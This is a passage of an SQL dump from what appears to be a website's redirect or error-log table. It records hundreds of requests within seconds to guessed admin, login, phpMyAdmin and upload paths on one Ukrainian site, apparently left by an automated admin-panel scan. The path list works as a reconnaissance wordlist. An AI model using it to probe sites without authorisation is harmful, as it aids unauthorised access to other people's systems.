00:00:00',301),(5022,'http://ekvatorprint.com.ua/admin/js/tiny_mce/',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5023,'http://ekvatorprint.com.ua/admin/js/tinymce/',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5024,'http://ekvatorprint.com.ua/admin/js/tinymce',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5025,'http://ekvatorprint.com.ua/admin/js/tiny_mce',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5026,'http://ekvatorprint.com.ua/admin/log',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5027,'http://ekvatorprint.com.ua/admin/login',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5028,'http://ekvatorprint.com.ua/admin/login.',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5029,'http://ekvatorprint.com.ua/admin/login.do',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5030,'http://ekvatorprint.com.ua/admin/login.html',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5031,'http://ekvatorprint.com.ua/admin/login.jsp',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5032,'http://ekvatorprint.com.ua/admin/login.py',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5033,'http://ekvatorprint.com.ua/admin/logon.jsp',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5034,'http://ekvatorprint.com.ua/admin/logs/',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5035,'http://ekvatorprint.com.ua/admin/login.rb',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5036,'http://ekvatorprint.com.ua/admin/logs/login.txt',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5037,'http://ekvatorprint.com.ua/admin/mysql/',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5038,'http://ekvatorprint.com.ua/admin/phpMyAdmin',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5039,'http://ekvatorprint.com.ua/admin/phpmyadmin/',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5040,'http://ekvatorprint.com.ua/admin/pma/',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5041,'http://ekvatorprint.com.ua/admin/pol_log.txt',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5042,'http://ekvatorprint.com.ua/admin/private/logs',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5043,'http://ekvatorprint.com.ua/admin/release',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5044,'http://ekvatorprint.com.ua/admin/signin',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5045,'http://ekvatorprint.com.ua/admin/secure/logon.jsp',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5046,'http://ekvatorprint.com.ua/admin/scripts/fckeditor',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5047,'http://ekvatorprint.com.ua/admin/sxd/',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5048,'http://ekvatorprint.com.ua/admin/tiny_mce',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5049,'http://ekvatorprint.com.ua/admin/tinymce',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5050,'http://ekvatorprint.com.ua/admin0',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5051,'http://ekvatorprint.com.ua/admin/upload.php',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5052,'http://ekvatorprint.com.ua/admin/uploads.php',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5053,'http://ekvatorprint.com.ua/admin/user_count.txt',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5054,'http://ekvatorprint.com.ua/admin09',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5055,'http://ekvatorprint.com.ua/admin1',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5056,'http://ekvatorprint.com.ua/admin08',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5057,'http://ekvatorprint.com.ua/admin00',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5058,'http://ekvatorprint.com.ua/admin1.',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5059,'http://ekvatorprint.com.ua/admin1.php',NULL,'','',2,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5060,'http://ekvatorprint.com.ua/admin1/',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5061,'http://ekvatorprint.com.ua/admin1.htm',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5062,'http://ekvatorprint.com.ua/admin1.html',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5063,'http://ekvatorprint.com.ua/admin12',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5064,'http://ekvatorprint.com.ua/admin123',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5065,'http://ekvatorprint.com.ua/admin150',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5066,'http://ekvatorprint.com.ua/admin2.php',NULL,'','',2,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5067,'http://ekvatorprint.com.ua/admin2',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5068,'http://ekvatorprint.com.ua/admin2.',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5069,'http://ekvatorprint.com.ua/admin2.asp',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5070,'http://ekvatorprint.com.ua/admin2/',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5071,'http://ekvatorprint.com.ua/admin2.cfm',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5072,'http://ekvatorprint.com.ua/admin2.old/',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5073,'http://ekvatorprint.com.ua/admin2.html',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5074,'http://ekvatorprint.com.ua/admin2/index.php',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5075,'http://ekvatorprint.com.ua/admin2/index.',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5076,'http://ekvatorprint.com.ua/admin2/login.php',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5077,'http://ekvatorprint.com.ua/admin2/login.',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5078,'http://ekvatorprint.com.ua/admin2006/',NULL,'','',1,0,'2017-01-20 13:27:21','0000-00-00 00:00:00',301),(5079,'http://ekvatorprint.com.ua/admin2008/',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5080,'http://ekvatorprint.com.ua/admin2009/',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5081,'http://ekvatorprint.com.ua/admin2007/',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5082,'http://ekvatorprint.com.ua/admin2008',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5083,'http://ekvatorprint.com.ua/admin2009',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5084,'http://ekvatorprint.com.ua/admin2007',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5085,'http://ekvatorprint.com.ua/admin2010/',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5086,'http://ekvatorprint.com.ua/admin2011',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5087,'http://ekvatorprint.com.ua/admin2010',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5088,'http://ekvatorprint.com.ua/admin2012/',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5089,'http://ekvatorprint.com.ua/admin21',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5090,'http://ekvatorprint.com.ua/admin/cp.html',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5091,'http://ekvatorprint.com.ua/admin2011/',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5092,'http://ekvatorprint.com.ua/admin256',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5093,'http://ekvatorprint.com.ua/admin3388',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5094,'http://ekvatorprint.com.ua/admin3',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5095,'http://ekvatorprint.com.ua/admin2013/',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5096,'http://ekvatorprint.com.ua/admin44cp',NULL,'','',1,0,'2017-01-20 13:27:22','0000-00-00 00:00:00',301),(5097,'http://ekvatorprint.com.ua/admin7',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5098,'http://ekvatorprint.com.ua/admin4.nsf',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5099,'http://ekvatorprint.com.ua/admin711',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5100,'http://ekvatorprint.com.ua/admin750',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5101,'http://ekvatorprint.com.ua/admin99',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5102,'http://ekvatorprint.com.ua/admin88',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5103,'http://ekvatorprint.com.ua/admin888',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5104,'http://ekvatorprint.com.ua/adminArea',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5105,'http://ekvatorprint.com.ua/adminB',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5106,'http://ekvatorprint.com.ua/adminCMS',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5107,'http://ekvatorprint.com.ua/adminCalendar.php',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5108,'http://ekvatorprint.com.ua/adminCalendar.',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5109,'http://ekvatorprint.com.ua/adminFiles',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5110,'http://ekvatorprint.com.ua/adminED',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5111,'http://ekvatorprint.com.ua/adminFlora',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5112,'http://ekvatorprint.com.ua/adminHome.php',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5113,'http://ekvatorprint.com.ua/adminHome.',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5114,'http://ekvatorprint.com.ua/adminLogin.php',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5115,'http://ekvatorprint.com.ua/adminLogin.',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5116,'http://ekvatorprint.com.ua/adminLogin.html',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5117,'http://ekvatorprint.com.ua/adminLogin/',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5118,'http://ekvatorprint.com.ua/adminMember.php',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5119,'http://ekvatorprint.com.ua/adminMember.',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5120,'http://ekvatorprint.com.ua/adminOLD',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5121,'http://ekvatorprint.com.ua/adminPHP',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5122,'http://ekvatorprint.com.ua/adminPR24',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5123,'http://ekvatorprint.com.ua/adminPanel',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5124,'http://ekvatorprint.com.ua/adminPeople.cfm',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5125,'http://ekvatorprint.com.ua/adminSettings.php',NULL,'','',1,0,'2017-01-20 13:27:23','0000-00-00 00:00:00',301),(5126,'http://ekvatorprint.com.ua/adminStatistics.php',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5127,'http://ekvatorprint.com.ua/adminStatistics.',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5128,'http://ekvatorprint.com.ua/adminWfvkW.php',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5129,'http://ekvatorprint.com.ua/adminTeb',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5130,'http://ekvatorprint.com.ua/adminWfvkW.',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5131,'http://ekvatorprint.com.ua/adminXP',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5132,'http://ekvatorprint.com.ua/admin_04',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5133,'http://ekvatorprint.com.ua/admin_',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5134,'http://ekvatorprint.com.ua/admin_05',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5135,'http://ekvatorprint.com.ua/admin_101',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5136,'http://ekvatorprint.com.ua/admin_19_july',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5137,'http://ekvatorprint.com.ua/admin_0ec',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5138,'http://ekvatorprint.com.ua/admin_1',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5139,'http://ekvatorprint.com.ua/admin_SigImage.php',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5140,'http://ekvatorprint.com.ua/admin_action.php',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5141,'http://ekvatorprint.com.ua/admin_SigImage.',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5142,'http://ekvatorprint.com.ua/admin_action.',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5143,'http://ekvatorprint.com.ua/admin_actions.php',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5144,'http://ekvatorprint.com.ua/admin_address.php',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5145,'http://ekvatorprint.com.ua/admin_actions.',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5146,'http://ekvatorprint.com.ua/admin_address.',NULL,'','',1,0,'2017-01-20 13:27:24','0000-00-00 00:00:00',301),(5147,'http://ekvatorprint.com.ua/admin_admin.',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5148,'http://ekvatorprint.com.ua/admin_ads.php',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5149,'http://ekvatorprint.com.ua/admin_admin.php',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5150,'http://ekvatorprint.com.ua/admin_advert.',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5151,'http://ekvatorprint.com.ua/admin_ads.',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5152,'http://ekvatorprint.com.ua/admin_advert.php',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5153,'http://ekvatorprint.com.ua/admin_album.php',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5154,'http://ekvatorprint.com.ua/admin_album.',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5155,'http://ekvatorprint.com.ua/admin_alldel.php',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5156,'http://ekvatorprint.com.ua/admin_alldel.',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5157,'http://ekvatorprint.com.ua/admin_area/',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5158,'http://ekvatorprint.com.ua/admin_area/admin.php',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5159,'http://ekvatorprint.com.ua/admin_area',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5160,'http://ekvatorprint.com.ua/admin_area/admin.',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5161,'http://ekvatorprint.com.ua/admin_area/admin.html',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5162,'http://ekvatorprint.com.ua/admin_area/index.php',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5163,'http://ekvatorprint.com.ua/admin_area/login.php',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5164,'http://ekvatorprint.com.ua/admin_area/index.',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5165,'http://ekvatorprint.com.ua/admin_area/login.',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5166,'http://ekvatorprint.com.ua/admin_area/login.html',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5167,'http://ekvatorprint.com.ua/admin_area/index.html',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5168,'http://ekvatorprint.com.ua/admin4',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5169,'http://ekvatorprint.com.ua/admin_assist.',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5170,'http://ekvatorprint.com.ua/admin_assist.php',NULL,'','',1,0,'2017-01-20 13:27:25','0000-00-00 00:00:00',301),(5171,'http://ekvatorprint.com.ua/admin_assist1.php',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5172,'http://ekvatorprint.com.ua/admin_assist2.php',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5173,'http://ekvatorprint.com.ua/admin777',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5174,'http://ekvatorprint.com.ua/admin_assist1.',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5175,'http://ekvatorprint.com.ua/admin_assist2.',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5176,'http://ekvatorprint.com.ua/admin_assist3.php',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5177,'http://ekvatorprint.com.ua/admin_assist3.',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5178,'http://ekvatorprint.com.ua/admin_awards.',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5179,'http://ekvatorprint.com.ua/admin_assist4.php',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5180,'http://ekvatorprint.com.ua/admin_assist4.',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5181,'http://ekvatorprint.com.ua/admin_backup',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5182,'http://ekvatorprint.com.ua/admin_backend',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5183,'http://ekvatorprint.com.ua/admin_awards.php',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5184,'http://ekvatorprint.com.ua/admin_badword.',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5185,'http://ekvatorprint.com.ua/admin_badword.php',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5186,'http://ekvatorprint.com.ua/admin_banner.php',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5187,'http://ekvatorprint.com.ua/admin_banner',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5188,'http://ekvatorprint.com.ua/admin_banner.',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5189,'http://ekvatorprint.com.ua/admin_bans.php',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5190,'http://ekvatorprint.com.ua/admin_bans.',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5191,'http://ekvatorprint.com.ua/admin_bedit.',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5192,'http://ekvatorprint.com.ua/admin_bedit.php',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5193,'http://ekvatorprint.com.ua/admin_bk',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5194,'http://ekvatorprint.com.ua/admin_beta',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5195,'http://ekvatorprint.com.ua/admin_board.',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5196,'http://ekvatorprint.com.ua/admin_board',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5197,'http://ekvatorprint.com.ua/admin_board.php',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5198,'http://ekvatorprint.com.ua/admin_boardset.php',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5199,'http://ekvatorprint.com.ua/admin_c',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5200,'http://ekvatorprint.com.ua/admin_boardset.',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5201,'http://ekvatorprint.com.ua/admin_cat.',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5202,'http://ekvatorprint.com.ua/admin_catalog',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5203,'http://ekvatorprint.com.ua/admin_cat.php',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5204,'http://ekvatorprint.com.ua/admin_censoring.php',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5205,'http://ekvatorprint.com.ua/admin_cd',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5206,'http://ekvatorprint.com.ua/admin_censoring.',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5207,'http://ekvatorprint.com.ua/admin_cmgd_1',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5208,'http://ekvatorprint.com.ua/adminSettings.',NULL,'','',1,0,'2017-01-20 13:27:26','0000-00-00 00:00:00',301),(5209,'http://ekvatorprint.com.ua/admin_cms',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5210,'http://ekvatorprint.com.ua/admin_common',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5211,'http://ekvatorprint.com.ua/admin_comp.',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5212,'http://ekvatorprint.com.ua/admin_count.php',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5213,'http://ekvatorprint.com.ua/admin_compactdb.php',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5214,'http://ekvatorprint.com.ua/admin_comp.php',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5215,'http://ekvatorprint.com.ua/admin_config.php',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5216,'http://ekvatorprint.com.ua/admin_config.',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5217,'http://ekvatorprint.com.ua/admin_control',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5218,'http://ekvatorprint.com.ua/admin_compactdb.',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5219,'http://ekvatorprint.com.ua/admin_count.',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5220,'http://ekvatorprint.com.ua/admin_cp',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5221,'http://ekvatorprint.com.ua/admin_custom',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5222,'http://ekvatorprint.com.ua/admin_d',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5223,'http://ekvatorprint.com.ua/admin_customers.',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5224,'http://ekvatorprint.com.ua/admin_customers.php',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5225,'http://ekvatorprint.com.ua/admin_data.php',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5226,'http://ekvatorprint.com.ua/admin_data.',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5227,'http://ekvatorprint.com.ua/admin_default.php',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5228,'http://ekvatorprint.com.ua/admin_db',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5229,'http://ekvatorprint.com.ua/admin_deletecat.php',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5230,'http://ekvatorprint.com.ua/admin_default.',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5231,'http://ekvatorprint.com.ua/admin_deletecat.',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5232,'http://ekvatorprint.com.ua/admin_down.php',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5233,'http://ekvatorprint.com.ua/admin_dev',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5234,'http://ekvatorprint.com.ua/admin_dev.',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5235,'http://ekvatorprint.com.ua/admin_dev.php',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5236,'http://ekvatorprint.com.ua/admin_dir',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5237,'http://ekvatorprint.com.ua/admin_down.',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5238,'http://ekvatorprint.com.ua/admin_edit.php',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5239,'http://ekvatorprint.com.ua/admin_edit.',NULL,'','',1,0,'2017-01-20 13:27:27','0000-00-00 00:00:00',301),(5240,'http://ekvatorprint.com.ua/admin_edit_firm.php',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5241,'http://ekvatorprint.com.ua/admin_edit_firm.',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5242,'http://ekvatorprint.com.ua/admin_edite.php',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5243,'http://ekvatorprint.com.ua/admin_edit_page.php',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5244,'http://ekvatorprint.com.ua/admin_edit_page.',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 